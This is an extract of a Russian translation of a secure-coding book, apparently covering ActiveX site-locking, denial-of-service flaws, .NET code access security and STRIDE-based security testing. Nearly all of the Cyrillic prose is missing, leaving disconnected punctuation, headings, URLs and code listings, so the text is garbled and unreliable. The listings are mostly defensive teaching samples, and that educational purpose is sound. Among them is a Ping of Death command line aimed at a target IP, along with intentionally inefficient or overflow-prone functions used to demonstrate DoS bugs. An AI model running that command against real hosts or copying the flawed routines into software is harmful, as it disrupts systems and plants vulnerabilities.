;
;
(,
);
,
.
444
III
, ActiveX
.
,
, RunCode, PrintDoc, EraseFile, Shell, Call, Write, Read
. .
:
. ,
, ,
.
IObjectSafety.
( Internet Explorer) ,
.

(. 19).

, ActiveX
, . ,
ActiveX , Web
, northwindtraders.com.
.
1. IobjectWithSite SetSite,
(, Internet Explorer),
IUknown (
Ocidl.h). IobjectWithSite ActiveX
.
2. :
pUnk!>QueryInterface(IID_IServiceProvider, &pSP);
pSP!>QueryService(IID_IWebBrowser2, &pWB);
pWB!>getLocationURL(bstrURL);
3. , , bstrURL
URL. .
, , northwindtraders.com (,
) . ,
www.northwindtraders.com.foo.com!
InternetCrackUrl Wininet.dll,
URL ( lpUrlComponent>lpszHostName),
.
(. Secureco2\Chapter 16\InternetCrackURL)
.
/*
InternetCrackURL.cpp
*/
BOOL IsValidDomain(char *szURL, char *szValidDomain,
BOOL fRequireHTTPS) {
URL_COMPONENTS urlComp;
16
RPC, ActiveX- DCOM
445
ZeroMemory(&urlComp, sizeof(urlComp));
urlComp.dwStructSize = sizeof(urlComp);
// .
char szHostName[128];
urlComp.lpszHostName = szHostName;
urlComp.dwHostNameLength = sizeof(szHostName);
BOOL fRet = InternetCrackUrl(szURL, 0, 0, &urlComp) ;
if (fRet==FALSE) {
printf("InternetCrackURL failed ! > %d", GetLastError());
return FALSE;
}
// HTTPS, .
if (fRequireHTTPS && urlComp.nScheme != INTERNET_SCHEME_HTTPS)
return FALSE;
// ,
// .
int cbHostName = lstrlen(szHostName);
int cbValid = lstrlen(szValidDomain);
int cbSize = (cbHostName > cbValid) ? cbValid : cbHostName;
for (int i=1; i <= cbSize; i++)
if (szHostName[cbHostName ! i] != szValidDomain[cbValid ! i])
return FALSE;
return TRUE;
}
void main() {
char *szURL="https://www.northwindtraders.com/foo/default.html";
char *szValidDomain = "northwindtraders.com";
BOOL fRequireHTTPS = TRUE;
if (IsValidDomain(szURL, szValidDomain, TRUE)) {
printf(" , %s .", szURL) ;
}
}
IsValidDomain , ActiveX
, Web,
northwindtraders.com.
,
COM msdn.microsoft.com,
Microsoft Knowledge Base, HOWTO: Tie ActiveX Controls to a
Specific Domain ( ActiveX )
(support.microsoft.com/support/kb/articles/Q196/0/61.ASP), ATL
ActiveX .
446
III
SiteLock
Windows Office
2002 . SiteLock, ATL ++,
Web .
SiteLock ActiveX
,
, ActiveX
. SiteLock
ActiveX,
.
, ActiveX
.
SiteLock
http://msdn.microsoft.com/downloads/samples/internet/components/
sitelock/default.asp.
Kill Bit
,
ActiveX . ,
ActiveX
. Web
ActiveX :
. , . HKLM\Soft
ware\Microsoft\Internet Explorer ActiveX Compatibility,
ActiveX (CLSID).
ActiveX,
( ),
CLSID , REG_DWORD
Compatibility Flags 0x00000400. , .
ActiveX
, ,
ActiveX, .
Q240797 Microsoft Knowledge Base.
DCOM ActiveX RPC; ,

RPC, . ,
:
RPC /robust MIDL
SYSTEM;
DCOM SYSTEM;
ActiveX
, , ,
SiteLock.
17

(Denial of Service, DoS)

. , ,
, .
DoS
.
DoS, ,
, :
, ,
. DoS , .
DoS,
:
/ ;
;
;
;
.
,
DoS, ,
.
. UDP
(UDP bomb) SunOS 4.x. UDP
, ,
. ,
448
III
(, UNIX , Windows
),
.
ping (Ping of Death),
IP. DoS
. IPv4:
struct ip_hdr
{
unsigned char ip_version:4,
ip_header_len:4;
unsigned char ip_type_of_service;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_offset;
unsigned char ip_time_to_live;
unsigned char ip_protocol;
unsigned short ip_checksum;
struct in_addr ip_source, ip_destination;
};
ip_len .
(unsigned short) 65 535,
65 535 . ip_offset
.
, ,
, .
0, :
, . 13
.
8 , 65 535 .
? ,
( 65 535).
,
216.
, , ping (Ping
of Death),
, , http://www.insecure.org/sploits/pingodeath.html.
,
, . ,
: ,
ping l 65510 <IP >

Microsoft Windows 95/NT
UNIX Linux, .
? ,
, .
17
449

. , DoS,
, , ,
.
.
/*
,

*/
#include <winsock2.h>
#include <list>
// .
// .
// .
struct ip_hdr
{
unsigned char ip_version:4,
ip_header_len:4;
unsigned char ip_type_of_service;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_offset;
unsigned char ip_time_to_live;
unsigned char ip_protocol;
unsigned short ip_checksum;
struct in_addr ip_source, ip_destination;
};
typedef list<ip_hdr> FragList;
bool ReassemblePacket(FragList& frags, char** outbuf)
{
// , ,
// .
// ,
// .
unsigned long packetlen = 0;
// ""
// .
unsigned short last_offset;
unsigned short datalen;
ip_hdr Packet;
//
450
III
// .
// .
Packet = frags.back();
// , 8 .
// .
last_offset = (Packet.ip_offset & 0x1FFF) * 8;
// , ,
// !
datalen = Packet.ip_len ! Packet.ip_header_len * 4;
// unsigned long
// .
packetlen = (unsigned long)last_offset + (unsigned long)datalen;
// packetlen unsigned short,
// :
// offset = 0xfff0;
// datalen = 0x0020;
// total = 0x10010
// 0x0010
// true,
// unsigned short 0xffff.
if(packetlen > 0xffff)
{
// !! !
return false;
}
// .
// ...
return true;
}
:
. ,
,
Microsoft Office .
/* */
struct UNICODE_STRING
{
WCHAR* buf;
unsigned short len;
unsigned short max_len;
17
451
};
void CopyString(UNICODE_STRING* pStr)
{
WCHAR buf[20];
// ?
if(pStr!>len < 20)
{
memcpy(buf, pStr!>buf, pStr! >len * sizeof(WCHAR));
}
// ! .
}
, ,
NULL.
, . :
, . ,
RPC ,
. ,
pStr>buf NULL. ,
.
,
(
) . ,
. ,
: c:\\foo.txt
, c:\foo.txt . ,
,
? (.
Secureco2\Chapter17\CPUDoS):
/*
CPU_DoS_Example.cpp

.
.
.
*/
#include <stdio.h>
#include <assert.h>
/*
452
III
,
.

.
true, .
*/
// , buf .
bool StripBackslash1(char* buf)
{
char* tmp = buf;
bool ret = false;
for(tmp = buf; *tmp != '\0'; tmp++)
{
if(tmp[0] == '\\' && tmp[1] == '\\')
{
//
// strcpy,
// !
// , .
// !
// .
strcpy(tmp, tmp+1);
ret = true;
}
}
return ret;
}
/*
.
!
,
.
*/
bool StripBackslash2(char* buf)
{
unsigned long len, written;
char* tmpbuf = NULL;
char* tmp;
bool foundone = false;
len = strlen(buf) + 1;
if(len == 1)
return false;
17
tmpbuf = (char*)malloc(len);
// , ! .
if(tmpbuf == NULL)
{
assert(false);
return false;
}
written = 0;
for(tmp = buf; *tmp != '\0'; tmp++)
{
if(tmp[0] == '\\' && tmp[1] == '\\')
{
// .
foundone = true;
}
else
{
tmpbuf[written] = *tmp;
written++;
}
}
if(foundone)
{
//
// strncpy
// null.
// tmp
// .
strncpy(buf, tmpbuf, written);
buf[written] = '\0';
}
if(tmpbuf != NULL)
free(tmpbuf);
return foundone;
}
{
char* input;
char* end = "foo";
DWORD tickcount;
int i, j;
// .
for(i = 10; i < 10000001; i *= 10)
453
454
III
{
input = (char*)malloc(i);
if(input == NULL)
{
assert(false);
break;
}
// .
// , "foo".
// 2 input[j],
// "foo\0".
for(j = 0; j < i ! 5; j += 3)
{
input[j] = '\\';
input[j+1] = '\\';
input[j+2] = 'Z';
}
// , j
// .
strncpy(input + j, end, 4);
tickcount = GetTickCount();
StripBackslash1(input);
printf("StripBackslash1: = %d , = %d \n",
i, GetTickCount() ! tickcount);
// !
// .
for(j = 0; j < i ! 5; j += 3)
{
input[j] = '\\';
input[j+1] = '\\';
input[j+2] = 'Z';
}
// , j
// .
strncpy(input + j, end, 4);
tickcount = GetTickCount();
StripBackslash2(input);
printf("StripBackslash2: = %d , = %d \n",
i, GetTickCount() ! tickcount);
free(input);
}
return 0;
}
17
455
CPU_DoS_Example.cpp
. main
. StripBackslash1
,
:
. StripBackslash2
,
,
. . 171 .
17-1. CPU_DoS_Example.cpp

StripBackslash1,

StripBackslash2,
10
100
1000
10 000
111
100 000
11 306
1 000 000
2 170 160
20
, ,
10 000 . 1 . ,
36 Pentium III ( 800 ).
,
.
,
StripBackslash2 ,
. ,
.
GetTickCount 0
1 . ,
,
, .
StripBackslash1 StripBackslash2
,
. Strip
Backslash2 ,
. ,
,
DoS.

. ,
, ,
, DoS.
StripBackslash3.
456
III
bool StripBackslash3(char* str)

{
char* read;
char* write;
// .
assert(str != NULL);
if(strlen(str) < 2)
{
// .
return false;
}
// .
for(read = write = str + 1; *read != '\0'; read++)
{
// ,
// ,
// write, read .
if(*read == '\\' && *(read ! 1) == '\\')
{
continue;
}
else
{
*write = *read;
write++;
}
}
// .
*write = '\0';
return true;
}

, 19,
,
Microsoft Visual Studio, .
,
.
. ,
.
: .
.
, , .
17
457
, , (
) , ,
,
. , ,
, Profiler.
Visual Studio 6 Project
Settings Link. Category
General, Enable Profiling OK.
Profile.
, 1000 ( ,
, ), , :
Profile: Function timing, sorted by time

Date: Sat May 26 15:12:43 2001
Program Statistics
Command line at 2001 May 26 15:12:

"D:\DevStudio\MyProjects\CPU_DoS_Example\Release\CPU_DoS_Example"
Total time: 7.822 millisecond
Time outside of functions: 6.305 millisecond
Call depth: 2
Total functions: 3
Total hits: 7
Function coverage: 100.0%
Overhead Calculated 4
Overhead Average 4
Module Statistics for cpu_dos_example.exe
!
Time in module: 1.517 millisecond
Percent of time in module: 100.0%
Functions in module: 3
Hits in module: 7
Module function coverage: 100.0%
Func
Func+Child
Hit
Time %
Time
% Count Function
!
1.162 76.6
1.162 76.6
3 StripBackslash1(char *)
(cpu_dos_example.obj)
0.336 22.2
1.517 100.0
1 _main
0.019 1.3
0.019 1.3
3 StripBackslash2(char *)
Profiler , GetTickCount ,
, Profiler
StripBackslash1 StripBack
458
III
slash2.
100 ,
. , 10 , StripBack
slash2 StripBackslash1.
100 StripBackslash2 StripBackslash1.
,
, ,
.
,
.

DoS. , ,
, StripBackslash3,
StripBackslash2 StripBackslash3 (. 172).
17-2.
StripBackslash2 StripBackslash3
StripBackslash2, %
StripBackslash3, %
1000
2,5
1,9
1,32
10 000
16,7
14,6
1,14
100 000
33,6
23,3
1,44
1 000 000
46,6
34,2
1,36
. , StripBackslash2 .
,

,
.
,
. , .
,
,
. ,
, :
DoS ,
.
Profiler Visual Studio .NET,
Web http://
go.microsoft.com/fwlink/?Linkid=7256.
, ,
Compuware.
17
459
,
.

.
new, ,
. :
, InitializeCriticalSection EnterCriticalSection,
Windows XP/.NET Server EnterCriticalSection . :

, .
(David Meltzer) ,
Internet Security Systems. ,
Windows NT 4 Terminal Server Edition
( Microsoft Knowledge Base
http://support.microsoft.com/support/kb/articles/
Q238/6/00.ASP). ,
,
. Terminal Server (
, ),
( )
.
,
, .
,
.
,

. ,
.
. Windows NT
LSA LSA_HANDLE.
,
LSA, .
2048 LSA,

.
LSA ,
. ,
.

, , ;
, .
:
460
III
, , ,
.
.
,
. : ,
.
,
.
, ,
;
, .
! ?
.
? ,
Terminal Services
,
. ,
.

. : IPv6
IP, .
IPv4 IPv6
, .

. , ,
.
, ,
. ,
, .

,
, .
SYN (SYN flood) Microsoft:
, , ,
.
Microsoft [ SMB (Server Message Block) NetBIOS]
. ,
.
. , ,
.
, ,
, .
TLS (Transport Level Security),
, 2001 USENIX
Security Conference. Using Client Puzzles to Protect TLS
(Drew Dean) Xerox PARC
17
461
(Adam Stubblefield) (Rice University).

.
USENIX,
http://www.usenix.org/publications/library/proceedings/sec01/dean.html.

.
.

.
,

, ,
, echo chargen
( ). ,
.

. UDP,
TCP. , ,
chargen, echo
?
, echo chargen.
,
,
,
. ,
, chargen echo,
Windows NT 4 Windows,
. ,
, ,
chargen.
chargen echo
( 1024), .
, ,
, UDP 135
Windows NT Windows NT.
RPC (RPC endpoint mapping service).
,
. , ,

.
. ,
.
.
462
III
DoS
.
,
. ,
,
,
. , ,
,
, , ICMP (Internet Control Message Protocol) UDP.
,
, .
DoS,
.
.
, ,
,
DoS
.

. ,

.

.
,

. ,
, ,
.
18

.NET
. Microsoft
Professional Developers Conference ( 2001 .),
, ,
.NET Framework .
, SQL,
C++ C#, , .
(
C C++) ,
,
. ,
.NET.
? , Microsoft
.NET, ,
,
. ,
, ,

CLR (Common Language Runtime), Web XML.
,
, , :
(web.config);

, System. Security. Cryp
tography;
, .
464
III
CLR .NET ,
,
, ActiveX.
Microsoft Windows
. ,
,
, .
(restricted token) Windows 2000
( 7).
.NET :
,
(
) ,
.
, ,

. , (
,
) ,
, .
Web:
Web (, )
, . .NET

. ,
, Web.
,
, ,
.NET,
. ,
, .
.
: . !
.NET ,
.
! CLR , ,
.
, .

,
(Code Access Security, CAS) .NET.
18 .NET
465

,
.NET CLR. , ,
. ,
, .NET Framework Security (.
).
, CAS
: . :
, ,
(. 181).
,

?
. 181.
,

?
: ,
,
.
. , (. 182).

,
,

. 182. , ,
,
, CAS!
CAS. . 183.
466
III
,

?

,
,

. 183.
CAS
,
, ,
, . . 184,
CAS.
Assert()
Deny()
PermitOnly()

, ,

,

1990
. 184.
, CAS,
, .
: FxCop

, FxCop (
http://www.gotdotnet.com),
. FxCop ,
18 .NET
467
.NET .NET .NET

Framework Design Guidelines (http://msdn.microsoft.com/library/enus/cpgenref/ html/
cpconnetframeworkdesignguidelines.asp).
.
, , FxCop ,
, ,
. . 185
FxCop.
FxCop XML .
,
:
<?xml version=1.0"?>
:
<?xml!stylesheet href=C:\Program Files\Microsoft

FxCop\Xml\violationsreport.xsl
type=text/xsl?>
. 185.
FxCop
, FxCop
.
.

.
excel.exe, ? . ,
468
III
, ,
, Microsoft Excel. ,
Microsoft Excel? .NET
,
, ,
.
,
sn.exe. :
SN !k keypair.snk
keypair.snk ,
. (
; ,
.)
,
, .
, ,
, Authenticode. ,
, .
, .
, , ,
.
, ,
,
, , ,
.
Authen
ticode, .
, Authenticode.
, Authenticode
, , .
! ,
,
.
,
.
1024
RSA.
:
SN !p keypair.snk public.snk
, .
, ,
:
18 .NET
469
[assembly: AssemblyKeyFile(<____>)]
Visual Studio .NET
AssemblyInfo.cs AssemblyInfo.vb. Visual Basic .NET :
Imports System.Reflection
<Assembly: AssemblyKeyFileAttribute("c:\keys\keypair.snk")>
,
.
, ,
, . ,
:
SN !R <_>.dll keypair.snk

, .
:
SN !Vr <_>.dll
! ,
.
, Visual Basic .NET
:
<Assembly: AssemblyDelaySignAttribute(true)>
C# :
[assembly: AssemblyDelaySign(true)]
,
.
ASP.NET
, Web,
(global assembly cache, GAC)
.NET Configuration (Mscor
cfg.msc) gacutil.exe.
ASP.NET.

, CLR .NET
, .
,
. De
mand, CLR , ,
470
III
. .
(stack walk).
, ,
,
, .
?
.NET.
, ,
, , ,
.
.

,
, .
,
.
, .
, ,
.

, .
, FileIOPermission
, :
[assembly: FileIOPermission(SecurityAction.RequestMinimum,
Read = @"c:\files\inventory.xml")]

.

RequestMinimum.
, Policy
Exception .

,
, ,
. ,
,
:
[assembly: FileIOPermission(SecurityAction.RequestRefuse, Unrestricted = true)]

[assembly: EnvironmentPermission(SecurityAction.RequestRefuse, Unrestricted = true)]
18 .NET
471

, , ,
( ),
.

CLR
, , ,
.
.
,
FileIOPermission.
,
. :
[assembly: FileIOPermission(SecurityAction.RequestOptional, Unrestricted = true)]

,
, , ,
.
, :
[assembly: PermissionSet(SecurityAction.RequestOptional, Unrestricted = false)]

:
(PermMaximum (PermMinimum PermOptional)) ! PermRefused

,
, , .

, , ,
C# Visual Basic .NET .
(declarative permissions).
.
(imperative permissions)
.
, :
new FileIOPermission(FileIOPermissionAccess.Read,
@"c:\files\inventory.xml").Demand();
,
XML.
,
.
.
.
Permissions View (permview);
472
III
/decl.
,
.
,
.
caspol !a ! resolveperm myassembly.exe

. permview .NET Framework SDK,
.
Assert
Assert CLR
, ,
. Assert, : ,
. ,
.
! CLR CodeAccessPermission.Assert
assert C C++ Debug.Assert
.NET Framework.
, .
,
, / . ,
,
.
, : ,
. Assert ,

. ,
USB, UsbFileStream FileStream.
, USB API Win32, ,

, / (FileIOPermission).
UsbFileStream UnmanagedCode ( Win32
API) FileIOPermission, ,
/.
, (
, ) , .
, ../../boot.ini?
? , ,
18 .NET
473
(ACL) ,
FAT.

Assert, , , Assert
Demand Demand, . ,

.
,
.
! ,
SecurityPermissionFlag.Un
managedCode;
.
Demand Assert
Demand Assert
.
, ,
, . :
,
, SecurityPermissionFlag.Assertion.
.
, FileIOPermission,
, .
FileIOPermission, ,
.
, Demand
.

EmailAlertPermission,
. ,
.
! ,
Demand, . ,
Main ,
, .
,
Demand
*, SecurityManager. IsGranted,
. . .
474
III
, (
).
Main,
! ,
,
.
!
, .
. , Environ
mentPermission Environment . GetEnvironmentVariable,
.NET Framework .
, .
,
, ,
EmailAlertPermission (
), , SMTP,
SocketPermission.
,
, SocketPermission.
UnmanagedCode
.
,
, ,
.
UnmanagedCode? .

, .
:
.
FileIOPermission .
:
, , .
.
SecurityPermission. :
[SecurityPermission(SecurityAction.Assert,UnmanagedCode=true)]
Assert .
, ,
, :
try {
PermissionSet ps =
new PermissionSet(PermissionState.Unrestricted);
18 .NET
475
ps.AddPermission(new FileDialogPermission
(FileDialogPermissionAccess.Open));
ps.AddPermission(new FileIOPermission
(FileIOPermissionAccess.Read,@"c:\files"));
ps.Assert();
} catch (SecurityException e) {
// ! .
}

, ,
CodeAccessPermission. RevertAssert, ,
Assert.
; , ,
.
C# , ,
.
,
SMTP,
.
using
using
using
using
System;
System.Net;
System.Security;
System.Security.Permissions;
// ;
// .
static void SendAlert(string alert) {
//
// .
new EmailAlertPermission(
EmailAlertPermission.Send).Demand();
//
// SMTP!.
NetworkAccess na = NetworkAccess.Connect;
TransportType type = TransportType.Tcp;
string host = "mail.northwindtraders.com";
int port = 25;
new SocketPermission(na, type, host, port).Assert();
try {
SendAlertTo(host, port, alert);
} finally {
// ,
476
III
CodeAccessPermission.RevertAssert();
}
}
Assert, Deny PermitOnly ,
Deny, Assert
PermitOnly.
, A() B(),
C(), A() ReflectionPermission.
C() ReflectionPermission , ,
, . ? , ,
Assert,
A(). , .
private string filename = @"c:\files\fred.txt";

private void A() {
new FileIOPermission(
FileIOPermissionAccess.AllAccess,filename).Deny();
B();
}
private void B() {
C();
}
private void C() {
try {
new FileIOPermission(
FileIOPermissionAccess.AllAccess,filename).Assert();
try {
StreamWriter sw = new StreamWriter(filename);
sw.Write("!");
sw.Close();
} catch (IOException e) {
Console.Write(e.ToString());
}
} finally {
CodeAccessPermission.RevertAssert();
}
Assert C(), SecurityException
StreamWriter .
Demand LinkDemand
,
. .NET Framework
, ,
, . ,
System . IO. File FileIOPermission
18 .NET
477
. FileIOPermission File,
.
,
.
LinkDemand JIT
(justintime)
. ,
.
LinkDemand ,
(luring atack),

. LinkDemand ,
,
. .
- LinkDemand
. .
[PasswordPermission(SecurityAction.LinkDemand, Unrestricted=true)]
[RegistryPermissionAttribute(SecurityAction.PermitOnly,
Read=@"HKEY_LOCAL_MACHINE\SOFTWARE\AccountingApplication")]
public string returnPassword() {
return (string)Registry
.LocalMachine
.OpenSubKey(@"SOFTWARE\AccountingApplication\")
.GetValue("Password");
}
...
public string returnPasswordWrapper() {
return returnPassword();
}
, , ,
, ,
. returnPassword,
PasswordPermission. returnPassword,
,
. returnPasswordWrapper
LinkDemand returnPasswordWrapper
returnPassword
returnPassword, . ! ,
returnPasswordWrapper, .
LinkDemand JIT
,
, .
: LinkDemand
. ,
. ,
478
III
LinkDemand,
, ,
.
, , LinkDemand
? ,
LinkDemand , ,
.
! LinkDemand
(reflection) (
, ,
)

.
,
.
LinkDemand
,
Demand.
,
, .
SuppressUnmanagedCodeSecurityAttribute:

,
.
SuppressUnmanagedCodeSecurityAttribute , ,
. Demand LinkDemand,
.
,
Win32, .
MyWin32Funtion SuppressUnmanagedCode
SecurityAttribute.
using System.Security;
using System.Runtime.InteropServices;
...
public class MyClass {
...
[SuppressUnmanagedCodeSecurityAttribute()]
[DllImport("MyDLL.DLL")]
private static extern int MyWin32Function(int i);
public int DoWork() {
18 .NET
479
return MyWin32Function(0x42);
}
}

, .
! , , , LinkDemand SuppressUnmanagedCode
SecurityAttribute :
.
, ,
.
SuppressUnmanagedCodeSecurity,
: , ,
(private) (internal)
.

, ( ,
MarshalByRefObject) ,
, , Demand, LinkDemand InheritanceDemand, .
, ,
SOAP, Web.
. ,
.
, , ,
.

, , ,

.
; ,
. ,
, ; , ,
. :
protected, .
, ,
, , , C++.
(sealed) ( Visual Basic
NotInheritable), , .
.
. :
, .
.
480
III
,
.
. InheritanceDemand
, ,
,
. , ,
, EnvironmentPermission:
[EnvironmentPermission
(SecurityAction.InheritanceDemand, Unrestricted=true)]
public class Carol {
...
}
class Brian : Carol {
...
}
Brian Carol ,
EnvironmentPermission.
:
,
. , Private
KeyPermission ,
SetKey:
[PrivateKeyPermission
(SecurityAction.InheritanceDemand, Unrestricted=true)]
public virtual void SetKey(byte [] key) {
m_key = key;
DestroyKey(key);
}
, :
[StrongNameIdentityPermission(SecurityAction.LinkDemand,
PublicKey="00240fd981762 bd0000...172252f490edf20012b6")]
.
SiteLock ActiveX, 16.
, , :
. ,
, Web
. ! ,
(crosssite
scripting)!
private void function(string[] args) {

try {
new SiteIdentityPermission(
@"*.explorationair.com").Demand();
} catch (SecurityException e){
18 .NET
481
// , explorationair.com
}
}

XML-
, .
, web.config, ,
, . ,
, .
.
, XCOPY (
), .
ASP.NET 1.1 Data Protection API
, . ( DPAPI
9.) <processModel>, <identity>
<sessionState>. ,
, .
ASP.NET
aspnet_setreg. ,
ASP.NET:
<system.web>
<processModel
enable="true"
userName="registry:HKLM\Software\SomeKey,userName"
password="registry:HKLM\Software\SomeKey,passWord"
...
/>
</system.web>
CryptProtectData .
,
,
,
.

,
ASP.NET .
,
, .NET
AllowPartiallyTrustedCallersAttribute. ,
, ,
482
III
. ,
,
,
.
CLR .NET
Framework, ,
, .
. ,

. .
,
,
, AllowPartiallyTrustedCallersAttribute ,
:
[Assembly:AllowPartiallyTrustedCallers]
, ,
,
.
! ,
.
, ,
,
,
AllowPartiallyTrustedCallersAttribute.
, ,
.
1. A AllowPartiallyTrustedCallersAttribute.
2. B ,
.
3. B A, A
.
! AllowPartiallyTrustedCallersAttribute

.
,

, ,
, ,
. SuppressUnma
18 .NET
483
nagedCodeSecurityAttribute,
, :
.

C/C++
.NET Framework . ,
, ,
. , :
. ,
. , AppA, ; AppB
AppA AddHandler. ,
, , ,
System.Environment.Exit. AppA
.
.
,
:
public delegate string Function(int count, string name, DateTime dt);

, ,
System.Environment. Exit, .
,
PermitOnly Deny , .
,
,
:
new EnvironmentPermission(
EnvironmentPermissionAccess.Read,"USERNAME").PermitOnly();
, PermitOnly ( ,
), , .
.

, ISerializable,
.
?
public void WriteObject(string file) {

Password p = new Password();
Stream stream = File.Open(file, FileMode.Create);
BinaryFormatter bformatter = new BinaryFormatter();
bformatter.Serialize(stream, p);
stream.Close();
}
484
III
[Serializable()]
public class Password: ISerializable {
private String sensitiveStuff;
public Password() {
sensitiveStuff=GetRandomKey();
}
// .
public Password (SerializationInfo info, StreamingContext context) {
sensitiveStuff =
(String)info.GetValue("sensitiveStuff", typeof(string));
}
// .
public void GetObjectData
(SerializationInfo info, StreamingContext context) {
info.AddValue("sensitiveStuff", sensitiveStuff);
}
}
, sensitiveStuff,

( , !).
, :
[SecurityPermissionAttribute(SecurityAction.Demand,
SerializationFormatter=true)]

, /. ,

, . ,
, , ,
. C# , .
using System.IO.IsolatedStorage;
...
IsolatedStorageFile isoFile =
IsolatedStorageFile.GetStore(
IsolatedStorageScope.User | IsolatedStorageScope.Assembly,
,
,
: ,
,
, , .
Visual Basic.NET , .
18 .NET
485
Imports System.IO.IsolatedStorage
...
Dim isoStore As IsolatedStorageFile
isoStore = IsolatedStorageFile.GetStore( _
IsolatedStorageScope.User Or _
IsolatedStorageScope.Assembly Or _
IsolatedStorageScope.Domain, _
Nothing, Nothing)
,
, IsolatedStorageScope.Roaming.
Microsoft Windows
( Windows NT/2000
Windows 98),
.
IsolatedStorage
File. GetUserStoreForAssembly IsolatedStorageFile. GetUserStoreForDomain;
.
, ,
FileStream , FileIOPermission.

, , ,
,
.
XSLT !
XSLT (XSL Transformation) .NET
Framework,
System. Xml. Xsl. , XSLT ,
. XSLT
, ,
,
, XML.

ASP.NET
, , ,
. :

.
.
DEBUG IIS (Internet Information Services)
(. 186).
486
III
. 186. DEBUG
(), ,
SOAP
ASP.NET,
:
<%@ Page Language="VB" Trace="False" Debug="False" %>

:
<trace enabled = 'false'/>

<compilation debug = 'false'/>

<customErrors> ASP.NET
remoteOnly,
.

,
. remoteOnly (
) On. Off ,
.
<configuration>
<system.web>
<customErrors>
defaultRedirect="error.htm"
mode="RemoteOnly"
<error statusCode="404"
redirect="404.htm"/>
</customErrors>
</system.web>
</configuration>
18 .NET
487

.
, ,
.NET. CLR System. Run
time. Serialization
(serializing).
, ,
,
.
,
SerializationFormatter. ,
.
,
, .NET. , MFC
CAr
chive::<> >> CArchive::<> <<. MFC
, ,
.

.NET
.

. :
try {
// ! .
Result.WriteLine(e.ToString());
}
:
System.Security.SecurityException: Request for the permission of type

System.Security.Permissions.FileIOPermission...
at System.Security.SecurityRuntime.FrameDescHelper(...)
at System.Security.CodeAccessSecurityEngine.Check(...)
at System.Security.CodeAccessSecurityEngine.Check(...)
at System.Security.CodeAccessPermission.Demand()
at System.IO.FileStream..ctor(...)
at Perms.ReadConfig.ReadData() in
c:\temp\perms\perms\class1.cs:line 18
:
. ,
488
III
, .
Win
dows, .
try {
// ! .
#if(DEBUG)
Result.WriteLine(e.ToString());
#else
Result.WriteLine(" .");
new LogException().Write(e.ToString());
#endif
}
public class LogException {
public void Write(string e) {
try {
new EventLogPermission(
EventLogPermissionAccess.Instrument,
"machinename").Assert();
EventLog log = new EventLog("Application");
log.Source="MyApp";
log.WriteEntry(e, EventLogEntryType.Warning);
} catch(Exception e2) {
// ! .
}
}
}
EventLogPermission(). Assert,
. , ,
, .
.NET Framework CLR

.
, ,
. ,
. ,
, .

: Web,
,
, .
ActiveX ,
, , ;
.
18 .NET
489
Microsoft .NET
http://msdn.microsoft.com. Security Concerns for
Visual Basic .NET and Visual C# .NET Programmers (
Visual Basic .NET Visual C# .NET) (http://msdn.microsoft.com/
library/enus/dv_vstechart/html/vbtchsecurityconcernsforvisualbasicnetprogrammers.asp)
.
I V
19

, ,
, ,
,
! ,
,
, . ;
.
,

.
, .
, ,
, .

, Microsoft Windows, Linux,
UNIX MacOS.

. .

; ,
.

, , ,
.
, ,
19
493
,
. , ,
:
.
,
. ,
,
.
,
, ,
.
, ,
, . :
,
.
,

. ,
.

, , , .
!
, .
! ,
. ,
!

, ,
.
, .
,
. :
, ,
, ,
,
,
. ,
, . ,

. :
494
IV
, ,
.
,
, .
, 2!
.
: ,
!, : ,
! .
,
.
,
, . , ,
, !
!
:
. ,
, ,
. .
http://www.securityfocus.com,
, .
-

,
,
. ,
, .
1. .
2. .
3. .
4. , .
5. , () .
:
,
,
,
. ,
.
19
495

,
. . ,
,
. ,
: , ,
(STRIDE), (DREAD
). .
, .
, , . ,

. , ,
?

,
,
. ,
.
.
. ,
, .
:
TCP UDP;
, ;
NetBIOS;
;
(Dynamic Data Exchange, DDE);
;
;
(
), ;
;
(local procedure call, LPC) (remote proce
dure call, RPC) ;
, COM;
ActiveX ( <OBJECT>);
EXE DLL;
/ ,
;
;
496
IV
HTTP;
SOAP (Simple Object Access Protocol);
RAPI (Remote API), ;
;
;
;
, OLE DB ODBC;
;
(storeandforward), ,
SMTP, POP MAPI
, MSMQ;
( );
;
;
LDAP, Active Directory;
, (IrDA), USB, COM
, FireWire (IEEE 1394), Bluetooth .

,
.
,
.

. (. 191) ,
. ,
: .
19-1.

, ,
, SYSTEM ( Microsoft Windows NT
) root ( UNIX Linux)

,
C C++, VB, C#, Perl .
C C++
2
1
1
2
1
497
19
19-1.
()
, , ,
,

.
!
,

. . 192
. ,
.
19-2.
, RPC, , NetBIOS
Active Directory
HTTP
HTTP, ,
, MIME,
XML,
SOAP
COM
argv[]
C C++, ,
WScript. Windows
WSH String[] args
C#
, ,
,
(test case).
, STRIDE.
STRIDE
, STRIDE,
,
.
498
IV
. . 410 ( 4)
.
.
. 193 , ,
,
. ,
( !).
. 193 ,
.
, , ,
, , DLL.
.
19-3.
(spoofing identity)

:
, ,
?

.

?
(,
cookie) , ?
:
,
?

(tampering with data)

.
,
?
, MAC ,

.
,
,
, SSL/TLS IPSec

(repudiation)
,
?
,
? ,
,
.

? (.
.)
19
19-3.

499
()

.
(Information disclosure)
(, .) .
(sniffer)
.

.
,
.
,
.
, .
DoS !
(DoS)
,
.
?
,
.
(,
,
) ?
,
(Elevation of privilege)
,
.
?

,
?
!
, .
! ,
,
.
, STRIDE,
. .

. (data muta
tion) , ,
, , .
500
IV
,
, , , ,
, .
,
DoS.
, , DoS,
.
DoS.
! DoS,
.
,
,
.
. 191 ,
.
(Cv)
(Cr)
Null (Cn)
(Ct)
(Cps)
(Cz)
(Cs)
(Nr)
(Cpm)
(Cpe)

(Co)
(Cps)
(No)

(Nh)
HTML (Cph)
(Cpq)
(Ol)
(Oa)
(Ll)
(Or)
(On)
(Od)
(Oe)
(Lz)
(Ls)
. 191.

, .
.
, DoS. ,
,
. ,

19
501
,
,
.

, .
(
) ( ).
( ) ,
. , , ,
, . , , ,
!

.
(Oa); ,
(ACE). (Or)
. ,
, ACE .
, , . Windows
, .
, ,
(Oe) (Od). ,
. , ?
?
, , ,
? ( UNIX) .
, ,
? 11,
.

(. 191). ,
, . ,
Config.xml, ,
( . 191 Ll), Myreallybigconfig.xml,
( . 191 Ls) , C.xml,? ,
(Cr), RfQy6J.87d?

, :
.
, . ,
, , .
.
, .
502
IV

(Cr) ,
,
. ,
, , ,
, . ,

.
, ,
Perl.
srand time;
my $size = 256;
my @chars = ('A'..'Z', 'a'..'z', 0..9, qw( ! @ # $ % ^ & * ! + = ));
